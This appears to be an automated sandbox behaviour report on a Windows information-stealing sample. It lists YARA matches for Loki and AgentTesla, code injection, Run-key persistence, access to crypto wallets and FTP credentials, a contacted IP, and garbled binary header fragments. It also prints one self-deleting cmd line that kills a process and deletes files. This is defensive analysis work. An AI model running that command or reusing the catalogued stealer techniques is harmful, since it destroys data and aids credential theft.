InternetReadFile July 19, 2021, 10:31 a.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $¦È¼Aâ©Òâ©Òâ©ÒV5=à©ÒëÑAú©Ò;ËÓá©Òâ©Ó"©Ò;ËÑë©Ò;ËÖî©Ò;Ë×ô©Ò;ËÚ©Ò;ËÒã©Ò;Ë-ã©Ò;ËÐã©ÒRichâ©ÒPEL8'Yà"!P± Ðaz@AðCÏôR,øx8?4:ðf8È(@Pð@@.textr `.data( @À.idata6P @@.didat4p6@À.rsrcø8@@.reloc4:<<@B request_handle: 0x00cc000c	1	1
InternetReadFile July 19, 2021, 10:31 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $#4gâZßgâZßgâZßnÉßsâZß¾[ÞeâZßùBßcâZß¾YÞjâZß¾_ÞmâZß¾^ÞlâZßE[ÞoâZß¬[ÞdâZßgâ[ßâZß¬^ÞmãZß¬ZÞfâZß¬¥ßfâZß¬XÞfâZßRichgâZßPELbë[à"!êwð@·»@ =T°pæÐÀ}pTÈ@ø.textèê `.rdataRTî@@.datatG`"B@À.rsrcp°d@@.reloc}À~h@B request_handle: 0x00cc000c	1	1
InternetReadFile July 19, 2021, 10:31 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $¢l$æ JOæ JOæ JOïuÙOê JO?oKNä JO?oINä JO?oONì JO?oNNí JOÄmKNä JO-nKNå JOæ KO~ JO-nNNò JO-nJNç JO-nµOç JO-nHNç JORichæ JOPEL¿bë[à"!¶b¼ÐP ±@¨¸È0xÐ@`ÐþT(ÿ@Ðl.textË´¶ `.rdata DÐFº@@.data @À.rsrcx0@@.reloc`@@B request_handle: 0x00cc000c	1	1
InternetReadFile July 19, 2021, 10:31 a.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $ù£NEÍEÍEÍñ"GÍLà^NÍEÌlÍúÉUÍúÎVÍúÈAÍúÅ_ÍúÍDÍú2DÍúÏDÍRichEÍPEL8'Yà"!ê ® @¼@A°ð À H?0 °8è@¼.textÄéê `.dataDî@À.idata¸ð@@.rsrc ö@@.reloc 0ü@B request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0009c400', u'virtual_address': u'0x00001000', u'entropy': 7.982536504591275, u'name': u'.text', u'virtual_size': u'0x0009c250'}

entropy

7.98253650459

description

A section with a high entropy has been found

entropy

0.854993160055

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 19, 2021, 10:31 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Potentially malicious URLs were found in the process memory dump (1 event)

url	http://www.openssl.org/support/faq.html

Yara rule detected in process memory (50 out of 51 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Win32 PWS Loki	rule	Win32_PWS_Loki_Zero
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	browser info stealer	rule	infoStealer_browser_Zero
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg

Queries for potentially installed applications (45 events)

Time & API	Arguments	Status
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000004b8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0028-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0412-0000-0000000FF1CE}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1
RegOpenKeyExA July 19, 2021, 10:31 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x80000002 key_handle: 0x000004c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess July 19, 2021, 10:31 a.m.	status_code: 0x00000001 process_identifier: 2972 process_handle: 0x0000018c		0	0
NtTerminateProcess July 19, 2021, 10:31 a.m.	status_code: 0x00000001 process_identifier: 2972 process_handle: 0x0000018c	1	0	0

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	C:\Windows\System32\cmd.exe /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe" & del C:\ProgramData\*.dll & exit
cmdline	"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\test22\AppData\Local\5ea8b247-49da-4d2d-af5d-7a88dc570dd2\build2.exe" & del C:\ProgramData\*.dll & exit
cmdline	taskkill /im build2.exe /f

Communicates with host for which no DNS query was performed (1 event)

host

116.202.183.50

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 19, 2021, 10:30 a.m.	process_identifier: 2524 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1
NtAllocateVirtualMemory July 19, 2021, 10:31 a.m.	process_identifier: 2800 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1
NtAllocateVirtualMemory July 19, 2021, 10:31 a.m.	process_identifier: 2972 region_size: 659456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper

reg_value

"C:\Users\test22\AppData\Local\057e0315-19ab-4b5f-ac0a-2ac31eb16c86\build.exe" --AutoStart

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets\??????

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry	HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Potential code injection by writing to the memory of another process (3 events)

Time & API	Arguments	Status	Return
WriteProcessMemory July 19, 2021, 10:30 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2524 process_handle: 0x00000080	1	1
WriteProcessMemory July 19, 2021, 10:31 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2800 process_handle: 0x00000080	1	1
WriteProcessMemory July 19, 2021, 10:31 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2972 process_handle: 0x00000080	1	1

Collects information about installed applications (32 events)

Time & API	Arguments	Status
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA July 19, 2021, 10:31 a.m.	key_handle: 0x000004c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
